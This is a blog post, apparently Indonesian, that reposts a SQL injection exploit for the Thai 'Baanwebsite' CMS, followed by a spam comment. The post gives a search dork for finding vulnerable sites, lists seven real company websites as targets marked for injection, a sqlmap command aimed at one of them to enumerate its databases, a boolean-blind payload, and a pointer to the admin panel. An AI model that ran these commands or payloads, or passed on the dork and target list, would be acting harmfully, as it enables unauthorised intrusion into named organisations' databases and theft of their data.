Bugs Exploit Baanwebsite Sql İnjection Vulnerability tested on BackBox Linux

Information Exploit

[+] Exploit Title: Baanwebsite Sql İnjection Vulnerability
[+] Author : Cxsecurity.com and Magelang1337
[+] Dork : inurl:/php.?id= "Powered by บ้านเว็บไซต์"
[+] Tested on : BackBox 5.1, Chrome

On Target :
- http://www.onlinesolution.co.th/news/view.php?id=17[inject]
- http://steelline.co.th/product/view.php?prod_id=78[inject]
- http://www.zhanbua.com/product/view.php?id=122[inject]
- http://www.smartparkthailand.com/activities/view.php?id=9[inject]
- http://steelline.co.th/product/view.php?prod_id=8[inject]
- http://www.nyexpert87.com/products/view.php?id=32[inject]
- http://www.shizconfa.co.th/portfolio/view.php?id=4[inject]

[+] SQLMAP Poc :
sqlmap -u "http://www.onlinesolution.co.th/news/view.php?id=17" --dbs

[+] Poc SQL Injection :
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 9007=9007 AND 'pOJG'='pOJG
[+] Poc local Admin : /admin

Sumber Bugs Exploit : [https://cxsecurity.com/issue/WLB-2018050129]

Video tutorial

good luck.. and hopefully useful...
Next Post »

1 komentar:

Click here for komentar
April 17, 2019 at 2:03 AM ×

Nice post....Thanks for sharing the article....
We are providing the best master data services around the world....visit our site for more information....
master data management in sap
data cleansing tools
Master Data Governance
Data Cleansing Services
data classification tools
Master Data Management Solutions
data transformation service
Material Master Data Management
Master Data Dictionary

Congrats bro PiLoggroup you got PERTAMAX...! hehehehe...